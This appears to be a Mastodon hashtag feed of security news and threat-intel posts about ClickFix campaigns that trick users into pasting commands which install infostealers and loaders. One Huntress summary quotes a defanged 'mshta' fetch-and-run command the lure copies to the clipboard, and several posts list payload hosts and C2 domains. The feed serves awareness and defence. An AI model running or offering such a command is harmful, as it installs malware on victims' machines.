#clickfix

2025-12-17

⚠️ New #ClickFix malware campaign is tricking users with a fake browser “fix” prompt that leads to #DarkGate being installed via clipboard PowerShell commands. 📋

Read: hackread.com/clickfix-attack-f

#CyberSecurity #Malware #Windows #Scam #InfoSec

2025-12-16

Think parked domains are no big deal? Think again! These domains might seem benign on the surface, but our investigation into the risks of visiting parked domains might surprise you. In fact, if you were to visit a parked domain and actually see that typical park page, consider yourself lucky. Today, visits to these parked domains, which often happen accidentally, have become a source for traffic distribution systems, using a technique referred to by some as direct or zeroclick searches. In our experience this technique is much more likely to send you to threats like scams and malware. ClickFix? Sure. Results resembling what you were actually seeking? Not likely. To see what we found, check out our blog: blogs.infoblox.com/threat-inte
#InfobloxThreatIntel #dns #threatintel #threatintelligence #infosec #cybersecurity #infoblox #malicious #parking #domains #clickfix #phishing #scam

2025-12-16

Heads up on modified #clickfix ; doesn't fire until you click the Verify block:

abuse.ch :verified:abuse_ch@ioc.exchange
2025-12-15

Unknown malware using WebSockets for botnet command&control, spreading through #ClickFix ⤵️

🖱️ClickFix -> 📃VBS -> ⚙️MSI

Payload delivery host:
🌐 urlhaus.abuse.ch/host/103.27.1

Malware sample 🤖:
bazaar.abuse.ch/sample/4d8e5e8

Botnet C2 domains:
📡 w2li .xyz
📡 w2socks .xyz

The same malware is also being spread by #Amadey pay-per-install (PPI):
➡️ urlhaus.abuse.ch/url/3733103/

ClickFix infection chain
AllAboutSecurityallaboutsecurity
2025-12-12

ClickFix-Attacke missbraucht ChatGPT-Domain für macOS-Malware

Kaspersky-Forscher decken auf, wie Angreifer den gefährlichen AMOS-Infostealer über gefälschte Browser-Anleitungen verbreiten.

all-about-security.de/clickfix

2025-12-11

📢 ConsentFix : une attaque navigateur qui détourne les consentements OAuth via Azure CLI
📝 Source : Push Security.
📖 cyberveille : cyberveille.ch/posts/2025-12-1
🌐 source : pushsecurity.com/blog/consentf
#Azure_CLI #ClickFix #Cyberveille

2025-12-11

📢 GrayBravo: quatre clusters CastleLoader ciblent plusieurs secteurs avec phishing ClickFix et C2 redondants
📝 Selon Insikt Group (Recorded Future), avec une...
📖 cyberveille : cyberveille.ch/posts/2025-12-1
🌐 source : recordedfuture.com/research/gr
#CastleLoader #ClickFix #Cyberveille

2025-12-11

CastleLoader malware, known for Clickfix related attack, has been upgraded with a stealthy Python loader that helps it slip past security defenses.

Read: hackread.com/castleloader-malw

#CyberSecurity #Malware #InfoSec #CastleLoader #ClickFix

:mastodon: deciodecio@infosec.exchange
2025-12-10
2025-12-09

Der bislang als Initial‑Access‑Broker bekannte Akteur Storm‑0249 verändere sein Vorgehen grundlegend, berichtet ReliaQuest. Statt breiter Phishing‑Kampagnen setzt die Gruppe nun auf gezielte, schwer zu erkennbare Techniken, die speziell darauf abzielen, Endpoint‑Detection‑ und Response‑Lösungen (EDR) zu missbrauchen und damit die Grundlage für nachgelagerte Ransomware‑Angriffe zu legen.

Mehr: maniabel.work/archiv/745

#infossec #infosecnews #ransomware #storm0249 #clickfix #BeDiS

2025-12-03

Command copied, control lost: Fake #ChatGPT Atlas Browser used in a #ClickFix attack tricking users into installing password‑stealing malware via a fake installer.

Read: hackread.com/fake-chatgpt-atla

#CyberSecurity #Phishing #Malware #ChatGPTAtlas #Infosec

gtbarrygtbarry
2025-12-03

Maybe don't trust every Windows Update without checking - hackers hijack images to spread dangerous malware

Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.

ClickFix attacks convince users to execute commands in Windows by mimicking legitimate update prompts in full-screen web browser pages

techradar.com/pro/maybe-dont-t

2025-12-03

Fałszywa aktualizacja Windows – uwaga na metodę ClickFix

Czy weryfikacja zabezpieczająca stronę przed botami może być podstępem? A co z aktualizacją Windows? Badacze z Huntress przeanalizowali malware instalowane za pomocą ciekawej techniki. Mowa o ClickFix, czyli nakłonieniu do wklejenia i uruchomienia złośliwego polecenia. Standardowo wykorzystywano w tym celu strony/okna udające weryfikację – zabezpieczenie przed botami, o których pisaliśmy...

#Aktualności #Awareness #CAPTCHA #Clickfix #Phishing #Schowek #Windows

sekurak.pl/falszywa-aktualizac

2025-11-30

🎯 Threat Intelligence
===================

Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.

Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.

Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.

Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.

Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.

References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.

🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer

🔗 Source: huntress.com/blog/clickfix-mal

B'ad Samurai 🐐🇺🇦badsamurai@infosec.exchange
2025-11-27

Queue Windows 11 fix ClickFix in 3...2...

#windows11 #clickfix #microsoft

Microsoft: ClickFix is a top threat
Also Microsoft: Run this PowerShell to fix our vibe coding Windows 11

Screen shots of MSFT 2025 Threat report with ClickFix at 47% of initial access.

And the latest KB to "fix" Windows 11 issues with PowerShell scripts.
2025-11-26

ClickFix operators are now using fake full-screen “Windows Update” pages to push victims into running malicious commands. Combined with steganographic loaders and in-memory execution, these campaigns continue to evolve.

What detection or user-training approach do you think works best today?

Source: helpnetsecurity.com/2025/11/25

Follow @technadu for ongoing threat-intel breakdowns and practical defense insights.

#Infosec #ThreatIntel #ClickFix #EDR #CyberHygiene #MalwareTrends #SecurityOps #WindowsSecurity #InfoStealer

Fake “Windows Update” screens fuels new wave of ClickFix attacks
2025-11-26

🧩 1️⃣ ClickFix: ataques que engañan como si fueran actualizaciones de Windows.

Un reciente informe advierte como han actualizado la técnica maliciosa llamada ClickFix, usada por ciberdelincuentes para distribuir malware.

El ataque muestra una falsa pantalla de “actualización de Windows” en el navegador.

Si la víctima sigue las instrucciones (como presionar ciertas teclas), termina ejecutando un script malicioso que instala malware — sin descargar ningún archivo evidente ya que todo sucede en la memoria.

Las familias de malware que se instalan suelen ser infostealers o troyanos de acceso remoto, capaces de robar contraseñas, datos bancarios, credenciales de servicios y más.

🔒 ¿Una falsa actualización… o una puerta a robar tus datos?

#Privacidad #Ciberseguridad #Malware #ClickFix

muycomputer.com/2025/11/25/asi

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst